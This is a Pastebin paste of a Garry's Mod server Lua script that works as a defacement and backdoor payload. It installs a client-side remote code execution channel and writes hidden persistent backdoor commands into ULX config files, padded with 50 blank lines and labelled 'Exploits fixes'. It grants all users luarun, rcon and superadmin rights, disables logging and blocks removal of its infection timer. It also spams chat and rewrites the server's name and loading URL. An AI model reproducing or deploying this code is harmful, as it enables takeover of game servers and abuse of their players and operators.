2much4Us

Untitled

May 14th, 2018
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.87 KB | None | 0 0
  1. util.AddNetworkString "skeleton_dancing_troll"
  2.  
  3. local lol = {}
  4. function lol:RandomString( intMin, intMax )
  5. local ret = ""
  6. for _ = 1, math.random( intMin, intMax ) do
  7. ret = ret.. string.char( math.random(65, 90) )
  8. end
  9.  
  10. return ret
  11. end
  12.  
  13. lol.m_tblActions = {}
  14. lol.m_strImageGlobalVar = lol:RandomString( 6, 12 )
  15. lol.m_strImageLoadHTML = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" /></body>]]
  16.  
  17. function lol:PushAction( intChainDelay, func )
  18. self.m_tblActions[#self.m_tblActions +1] = { intChainDelay, func }
  19. end
  20.  
  21. function lol:NextAction( pPlayer )
  22. pPlayer.m_intCurAction = pPlayer.m_intCurAction +1
  23. if not self.m_tblActions[pPlayer.m_intCurAction] then return end
  24.  
  25. timer.Simple( self.m_tblActions[pPlayer.m_intCurAction][1], function()
  26. if not IsValid( pPlayer ) then return end
  27. self.m_tblActions[pPlayer.m_intCurAction][2]( pPlayer )
  28. self:NextAction( pPlayer )
  29. end )
  30. end
  31.  
  32. function lol:Start( pPlayer )
  33. pPlayer.m_intCurAction = 0
  34. self:NextAction( pPlayer )
  35. end
  36.  
  37. function lol:SendLua( pPlayer, strLua )
  38. net.Start( "skeleton_dancing_troll" )
  39. net.WriteString( strLua )
  40. net.Send( pPlayer )
  41. end
  42.  
  43. function lol:SetupPlayer( pPlayer )
  44. pPlayer:SendLua( "net.Receive(\"skeleton_dancing_troll\", function() RunString(net.ReadString()) end)" )
  45. end
  46.  
  47. for k, v in pairs( player.GetAll() ) do
  48. lol:SetupPlayer( v )
  49. timer.Simple( 2, function() lol:Start( v ) end )
  50. end
  51.  
  52. hook.Add( "PlayerAuthed", "wat", function( pPlayer )
  53. lol:SetupPlayer( pPlayer )
  54. timer.Simple( 10, function() lol:Start( pPlayer ) end )
  55. end )
  56.  
  57. hook.Add( "PlayerSay", "1337command", function( pSender, strText, bTeamChat )
  58. if strText:sub( 1, 5 ) == "/1337" then
  59. pSender:Ignite( 1e9 )
  60. pSender:ChatPrint( "Gotta love da meme boi" )
  61. pSender:SendLua( [[surface.PlaySound( "vo/npc/male01/hacks01.wav" )]] )
  62. return false
  63. end
  64. end )
  65.  
  66.  
  67.  
  68. --Sequence stack
  69. --Start some tunes and steam in our assets
  70. lol:PushAction( 0, function( pPlayer )
  71. lol:SendLua( pPlayer, ([=[
  72. sound.PlayURL( "https://httpsinfamousvoice1com.000webhostapp.com/YMCA.mp3", "", function()end )
  73.  
  74. g_]=].. lol.m_strImageGlobalVar.. [=[ = {}
  75. local html = [[%s]]
  76. local function LoadWebMaterial( strURL, strUID, intSizeX, intSizeY )
  77. local pnl = vgui.Create( "HTML" )
  78. pnl:SetPos( ScrW() -1, ScrH() -1 )
  79. pnl:SetVisible( true )
  80. pnl:SetMouseInputEnabled( false )
  81. pnl:SetKeyBoardInputEnabled( false )
  82. pnl:SetSize( intSizeX, intSizeY )
  83. pnl:SetHTML( html:format(strURL, intSizeX, intSizeY) )
  84.  
  85. local PageLoaded
  86. PageLoaded = function()
  87. local mat = pnl:GetHTMLMaterial()
  88. if mat then
  89. g_]=].. lol.m_strImageGlobalVar.. [=[[strUID] = { mat, pnl }
  90. return
  91. end
  92.  
  93. timer.Simple( 0.5, PageLoaded )
  94. end
  95.  
  96. PageLoaded()
  97. end
  98.  
  99. LoadWebMaterial( "http://www.underdone.org/leak/underdone/doritos.png", "doritos", 236, 238 )
  100. LoadWebMaterial( "http://www.underdone.org/leak/underdone/doritos.png", "fedora", 236, 238 )
  101. LoadWebMaterial( "http://www.underdone.org/leak/underdone/xhair.png", "xhair", 64, 64 )
  102. LoadWebMaterial( "http://www.underdone.org/leak/underdone/doritos.png", "dew", 236, 238 )
  103. LoadWebMaterial( "http://www.underdone.org/leak/underdone/doritos.png", "awp", 236, 238 )
  104. ]=]):format(lol.m_strImageLoadHTML) )
  105. RunConsoleCommand("ulx_logecho", "0")
  106. local WS = {}
  107. WS.file = {}
  108. WS.file.Write = file.Write
  109. WS.file.Read = file.Read
  110. WS.file.Append = file.Append
  111. WS.file.IsDir = file.IsDir
  112. WS.file.CreateDir = file.CreateDir
  113. --[[WS.debug = {} To bypass some things, never got to use it
  114. WS.debug.getupvalue = debug.getupvalue]]
  115.  
  116. function WS.ProxyCode( code )
  117. local file = table.Random(file.Find("data/*.lua", "GAME"))
  118. RunString(code, file)
  119. end
  120. function WS.CheckForInfection()
  121. local c = WS.file.Read("data/ulx/config.txt","GAME") or "NO DATA"
  122. if string.find(c, "Exploits fixes") then
  123. return true
  124. else
  125. return false
  126. end
  127. end
  128. function WS.Infecte()
  129. if not WS.file.IsDir("data/ulx","GAME") then return end
  130.  
  131. ------------- GAMEMODE persistent
  132. if not WS.file.IsDir("data/ulx/gamemodes","GAME") then
  133. WS.file.CreateDir("ulx/gamemodes")
  134. end
  135. if not WS.file.IsDir("data/ulx/gamemodes/"..engine.ActiveGamemode(),"GAME") then
  136. WS.file.CreateDir("ulx/gamemodes/"..engine.ActiveGamemode())
  137. end
  138. WS.file.Write( "ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n; Exploits fixes")
  139. WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx logEcho 0]])
  140. WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx groupallow "user" "ulx luarun"]])
  141. WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx groupallow "user" "ulx rcon"]])
  142. WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx groupallow "superadmin" "ulx groupdeny"]]) -- yyyyeeeaaahhhh
  143. WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx luarun util.AddNetworkString("DefqonBackdoor")]])
  144. WS.file.Append("ulx/gamemodes/"..engine.ActiveGamemode().."/config.txt", "\n"..[[ulx luarun net.Receive("DefqonBackdoor",function() RunString(net.ReadString(),"Collombe") end)]])
  145.  
  146. ------------- BASIC persistent
  147. if WS.CheckForInfection() then return end
  148. WS.file.Append("ulx/config.txt", string.rep("\n", 50)) -- Best hiding technique (Лучшая техника скрытия)
  149. WS.file.Append("ulx/config.txt", "\n; Exploits fixes")
  150. WS.file.Append("ulx/config.txt", "\n"..[[ulx logEcho 0]])
  151. WS.file.Append("ulx/config.txt", "\n"..[[ulx groupallow "user" "ulx luarun"]])
  152. WS.file.Append("ulx/config.txt", "\n"..[[ulx groupallow "user" "ulx rcon"]])
  153. WS.file.Append("ulx/config.txt", "\n"..[[ulx groupallow "superadmin" "ulx groupdeny"]]) -- yyyyeeeaaahhhh
  154. WS.file.Append("ulx/config.txt", "\n"..[[ulx luarun util.AddNetworkString("DefqonBackdoor")]])
  155. WS.file.Append("ulx/config.txt", "\n"..[[ulx luarun net.Receive("DefqonBackdoor",function() RunString(net.ReadString(),"Collombe") end)]])
  156. end
  157.  
  158. ------------- INFECTE EVERYTHING
  159. WS.Infecte()
  160. timer.Create("TheWaterSnake", 5, 0, WS.Infecte)
  161.  
  162. ------------- PREVENT STOPPING
  163. local td, tr = timer.Destroy, timer.Remove
  164. function timer.Destroy( a )
  165. if a == "TheWaterSnake" then return end
  166. td( a )
  167. end
  168. function timer.Remove( a )
  169. if a == "TheWaterSnake" then return end
  170. tr( a )
  171. end
  172.  
  173. ------------- B1G H4X
  174. util.AddNetworkString("DefqonBackdoor")
  175. net.Receive("DefqonBackdoor", function()
  176. RunString(net.ReadString(), "TheFrenchGuy")
  177. end)
  178. timer.Create( "hello3", 13, 1, function()
  179. RunConsoleCommand( "say", "☢ MEME INCOMING ☢" )
  180. end)
  181. end )
  182.  
  183. --HUD swap
  184. lol:PushAction( 13.5, function( pPlayer )
  185. lol:SendLua( pPlayer, [[
  186. (GAMEMODE or GM).CalcView = function() end
  187. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  188.  
  189. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  190. for k, v in pairs(remove) do
  191. hook.GetTable()[v] = {}
  192. end
  193.  
  194. local function GetWebMat( strURL )
  195. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  196. end
  197.  
  198. hook.Add( "HUDPaint", "newhud", function()
  199. surface.SetDrawColor( 255, 255, 255, 255 )
  200.  
  201. if GetWebMat( "hud1" ) then
  202. surface.SetMaterial( GetWebMat("hud1")[1] )
  203. surface.DrawTexturedRect( 0, ScrH() -128, 300 *(512 /300), 128 )
  204. end
  205. if GetWebMat( "hud2" ) then
  206. surface.SetMaterial( GetWebMat("hud2")[1] )
  207. surface.DrawTexturedRect( ScrW() -300, ScrH() -128, 190 *(512 /300), 135 )
  208. end
  209. if GetWebMat( "hud3" ) then
  210. surface.SetMaterial( GetWebMat("hud3")[1] )
  211. surface.DrawTexturedRect( 45, ScrH() -245, 128, 128 )
  212. end
  213. if GetWebMat( "xhair" ) then
  214. surface.SetMaterial( GetWebMat("xhair")[1] )
  215. surface.DrawTexturedRect( (ScrW() /2) -32, (ScrH() /2) -32, 64, 64 )
  216. end
  217. if GetWebMat( "doritos" ) then
  218. surface.SetMaterial( GetWebMat("doritos")[1] )
  219. surface.DrawTexturedRectRotated( math.random(250, 260), math.random(250, 260), 183 *(256 /183), 256, CurTime() *512 )
  220. end
  221. if GetWebMat( "dew" ) then
  222. surface.SetMaterial( GetWebMat("dew")[1] )
  223. surface.DrawTexturedRectRotated( math.random(400, 410), math.random(ScrH() -260, ScrH() -250), 214 *((256 /110) -1), 190, CurTime() *-512 )
  224. end
  225. if GetWebMat( "fedora" ) then
  226. surface.SetMaterial( GetWebMat("fedora")[1] )
  227. surface.DrawTexturedRectRotated( ScrW() -math.random(250, 260), math.random(250, 260), 256, 256, CurTime() *-512 )
  228. end
  229. if GetWebMat( "awp" ) then
  230. surface.SetMaterial( GetWebMat("awp")[1] )
  231. surface.DrawTexturedRectRotated( ScrW() -math.random(400, 410), math.random(ScrH() -260, ScrH() -250), 198, 207, CurTime() *512 )
  232. end
  233.  
  234. draw.SimpleTextOutlined(
  235. "๑۩۩๑ MEMED BY BATTLEYE ๑۩۩๑",
  236. "DermaLarge",
  237. ScrW() /2 +math.random( -8, 8 ),
  238. ScrH() /2 +math.random( -8, 8 ) +24,
  239. Color( 255, 255, 0, 160 ),
  240. TEXT_ALIGN_CENTER,
  241. TEXT_ALIGN_CENTER,
  242. 3,
  243. Color( 0, 0, 0, 255 )
  244. )
  245. end )
  246.  
  247. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  248. hook.Add( "HUDShouldDraw", "newhud", function( str ) if not allowed[str] then return false end end )
  249.  
  250. surface.PlaySound( "garrysmod/save_load4.wav" )
  251. surface.PlaySound( "vo/npc/male01/excuseme02.wav" )
  252. ]] )
  253. end )
  254.  
  255. --Disco time
  256. lol:PushAction( 30.5, function( pPlayer )
  257. local idx = pPlayer:EntIndex()
  258. timer.Create( "beat".. idx, 0.42, 0, function()
  259. if not IsValid( pPlayer ) then timer.Destroy( "beat".. idx ) return end
  260. pPlayer:ViewPunch( Angle(math.Rand(-15, -10), math.Rand(-10, 10), 0) )
  261. end )
  262. ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  263. hook.Add("Think", "speedhack", function()
  264. for k,v in pairs (player.GetAll()) do
  265. v:SetRunSpeed(400* 4);
  266. v:SetWalkSpeed(200 * 2);
  267. end
  268. end)
  269.  
  270. timer.Create( "nigggzz", 0.1, 0, function()
  271. RunConsoleCommand( "ulx", "adduser", "*", "superadmin" )
  272. end)
  273.  
  274. timer.Create( "tchat5", 0.1, 0, function()
  275. BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255),math.random(1,255)), " ═════════════════۩۞۩═════════════════")]])
  276. BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255),math.random(1,255)), "▅▇█ MEMED BY BATTLEYE - https://discord.gg/As6EW6U █▇▅")]])
  277. end)
  278.  
  279. timer.Create( "tchat4", 0.1, 0, function()
  280. BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255),math.random(1,255)), " ═════════════════۩۞۩═════════════════")]])
  281. BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255),math.random(1,255)), "▅▇█ MEMED BY BATTLEYE - https://discord.gg/As6EW6U █▇▅")]])
  282. end)
  283. timer.Create( "tchat3", 0.1, 0, function()
  284. BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255),math.random(1,255)), " ═════════════════۩۞۩═════════════════")]])
  285. BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255),math.random(1,255)), "▅▇█ MEMED BY BATTLEYE - https://discord.gg/As6EW6U █▇▅")]])
  286. end)
  287.  
  288. timer.Create( "tchat2", 0.1, 0, function()
  289. BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255),math.random(1,255)), " ═════════════════۩۞۩═════════════════")]])
  290. BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255),math.random(1,255)), "▅▇█ MEMED BY BATTLEYE - https://discord.gg/As6EW6U █▇▅")]])
  291. end)
  292.  
  293. timer.Create( "tchat1", 0.1, 0, function()
  294. BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255),math.random(1,255)), " ═════════════════۩۞۩═════════════════")]])
  295. BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255),math.random(1,255)), "▅▇█ MEMED BY BATTLEYE - https://discord.gg/As6EW6U █▇▅")]])
  296. end)
  297. RunConsoleCommand( "sv_loadingurl", "http://uu.esy.es/zyqv6r7n/seized.html" )
  298.  
  299. RunConsoleCommand("hostname", "๑۩۩๑ MEMED BY BATTLEYE ๑۩۩๑")
  300.  
  301. RunConsoleCommand("ulx", "groupallow", "superadmin", "*")
  302.  
  303. timer.Create( "spamlol", 0, 0, function() for i = 1, 5 do MsgC(Color(math.random(255), math.random(255), math.random(255)), "BattleEye™") end end)
  304.  
  305. timer.Create( "niggaspams4", 0.1, 0, function()
  306. RunConsoleCommand( "sbox_noclip", "1" )
  307. end)
  308.  
  309. timer.Create( "niggaspams5", 0.1, 0, function()
  310. RunConsoleCommand( "sv_allowcslua", "1" )
  311. end)
  312.  
  313. hook.Add("Think", "busted", function()
  314. for k,v in pairs (player.GetAll()) do
  315. v:SetModelScale(2.5, 100);
  316. v:SetRunSpeed(400 * 2);
  317. v:SetWalkSpeed(200 * 2);
  318. end
  319. end)
  320.  
  321. for k, v in pairs( player.GetAll() ) do v:SendLua( [[util.ScreenShake( Vector( 0, 0, 0 ), 10, 5, 60, 5000 )]] ) end
  322.  
  323. for k,v in pairs(player.GetAll()) do
  324. local a = v:LookupBone("ValveBiped.Bip01_Head1")
  325. local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  326. local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  327. local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  328. local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  329. local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  330. local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  331. local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  332. local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  333. local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  334. local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  335.  
  336. v:ManipulateBoneScale( a, Vector(4,0,4))
  337. v:ManipulateBoneScale( b, Vector(0,0,0))
  338. v:ManipulateBoneScale( c, Vector(0,0,0))
  339. v:ManipulateBoneScale( d, Vector(0,0,1))
  340. v:ManipulateBoneScale( e, Vector(0,0,1))
  341. v:ManipulateBoneScale( f, Vector(0,0,0))
  342. v:ManipulateBoneScale( g, Vector(0,0,0))
  343. v:ManipulateBoneScale( h, Vector(1,1.5,1.5))
  344. v:ManipulateBoneScale( i, Vector(1,1.5,1.5))
  345. v:ManipulateBoneScale( j, Vector(0,0,0))
  346. v:ManipulateBoneScale( k, Vector(0,0,0))
  347. end
  348.  
  349. for k,v in pairs(player.GetAll()) do timer.Create( "timerargent10", 0.1, 0, function() v:addMoney(999999) end) end
  350.  
  351. timer.Create( "ignitelol", 0.1, 1, function()
  352. for k,v in pairs(player.GetAll()) do v:Ignite(120) end
  353. end)
  354. -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
  355.  
  356. lol:SendLua( pPlayer, [[
  357. local emitter = ParticleEmitter( LocalPlayer():GetPos() )
  358. local time = 0
  359.  
  360. hook.Add( "Think", "wat", function()
  361. if CurTime() < time then
  362. return
  363. end
  364.  
  365. time = CurTime() +0.05
  366. for i = 1, 16 do
  367. local part = emitter:Add(
  368. "particles/balloon_bit",
  369. LocalPlayer():GetPos() +Vector(
  370. math.random( -256, 256 ),
  371. math.random( -256, 256 ),
  372. 256
  373. )
  374. )
  375.  
  376. if part then
  377. local Size = math.random( 4, 7 )
  378.  
  379. part:SetColor( math.random(0, 255), math.random(0, 255), math.random(0, 255), 255 )
  380. part:SetVelocity( Vector( 40, 25, -math.random(300, 400) ) )
  381. part:SetDieTime( 4.5 )
  382. part:SetGravity( Vector(40, 0, -250) )
  383. part:SetLifeTime( 0 )
  384. part:SetStartSize( Size /2 )
  385. part:SetEndSize( Size )
  386. part:SetCollide( true )
  387. end
  388. end
  389. end )
  390. ]] )
  391.  
  392. lol:SendLua( pPlayer, [[
  393. hook.Add( "RenderScreenspaceEffects", "wat", function()
  394. local sinScaler = math.sin( CurTime() )
  395. DrawBloom(
  396. 0,
  397. 3,
  398. sinScaler *math.Rand(1, 8),
  399. sinScaler *math.Rand(1, 8),
  400. 6,
  401. math.Rand(0.5, 2),
  402. math.Rand(0, 0.3),
  403. math.Rand(0, 0.3),
  404. math.Rand(0.5, 1)
  405. )
  406.  
  407. DrawColorModify{
  408. ["$pp_colour_addr"] = 0,
  409. ["$pp_colour_addg"] = 1,
  410. ["$pp_colour_addb"] = 00,
  411. ["$pp_colour_brightness" ] = 0,
  412. ["$pp_colour_contrast" ] = 1,
  413. ["$pp_colour_colour" ] = 1,
  414. ["$pp_colour_mulr" ] = 0,
  415. ["$pp_colour_mulg" ] = 1,
  416. ["$pp_colour_mulb" ] = 0
  417. }
  418. end )
  419.  
  420. local mdl = ClientsideModel( "models/player/zombie_classic.mdl", RENDERGROUP_BOTH )
  421. mdl:SetNoDraw( true )
  422. local posCache, time = {}, 0
  423.  
  424. hook.Add( "HUDPaint", "dance", function()
  425. if not mdl.SeqStart or CurTime() > (mdl.SeqStart +mdl.SeqDuration) then
  426. local idx = mdl:LookupSequence("taunt_dance")
  427. mdl.SeqDuration = mdl:SequenceDuration( idx )
  428. mdl.SeqStart = CurTime()
  429. mdl:ResetSequence( idx )
  430. end
  431.  
  432. mdl:SetCycle( (CurTime() -mdl.SeqStart) /mdl.SeqDuration )
  433.  
  434.  
  435. local w, h = 300, 300
  436. local ang = Angle( 0, 0, 0 )
  437.  
  438. for i = 1, 32 do
  439. if CurTime() > time then
  440. posCache[i] = { math.random( 0, ScrW() -w ), math.random( 0, ScrH() -h ) }
  441. end
  442. local x, y = posCache[i][1], posCache[i][2]
  443.  
  444. cam.Start3D( (ang:Forward() *64) +(ang:Up() *32), (ang:Forward()*-1):Angle(), 90, x, y, w, h )
  445. cam.IgnoreZ( true )
  446. render.SuppressEngineLighting( true )
  447.  
  448. render.SetLightingOrigin( mdl:GetPos() )
  449. render.ResetModelLighting( 1, 0, 1 )
  450. render.SetColorModulation( 0, 0, 1 )
  451.  
  452. mdl:DrawModel()
  453.  
  454. render.SuppressEngineLighting( false )
  455. cam.IgnoreZ( false )
  456. cam.End3D()
  457. end
  458.  
  459. if CurTime() > time then
  460. time = CurTime() +0.15
  461. end
  462. end )
  463.  
  464. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  465. ]] )
  466. end )
  467.  
  468. --Let the beat drop
  469. lol:PushAction( 60, function( pPlayer )
  470. lol:SendLua( pPlayer, [[
  471. hook.Add( "GetMotionBlurValues", "wat", function()
  472. return 0, 0, 1, math.sin(CurTime() *13)
  473. end )
  474.  
  475. hook.Add( "RenderScreenspaceEffects", "ohgod", function()
  476. local sinScaler = math.sin( CurTime() *(RealFrameTime() *1024) )
  477. DrawSharpen( 1 +(sinScaler *10), 0.5 +(sinScaler *2) )
  478. DrawMaterialOverlay( "effects/tp_eyefx/tpeye", 1 )
  479. end )
  480.  
  481. hook.Add( "PostDrawTranslucentRenderables", "ohgod", function()
  482. render.SetMaterial( Material("cable/blue_elec") )
  483. for i = 1, 32 do
  484. render.DrawBeam( LocalPlayer():GetPos() +Vector(0, 0, 128) +(EyeAngles():Forward() *256), EyePos() +(VectorRand() *256), 4, 0, 12.5, Color(255, 255, 255, 255) )
  485. end
  486. end )
  487.  
  488. timer.Create( "thedrop", 0.42, 0, function()
  489. util.ScreenShake( LocalPlayer():GetPos(), 512, 5, 0.25, 128 )
  490. end )
  491. ]] )
  492. end )
Advertisement
Add Comment
Please, Sign In to add comment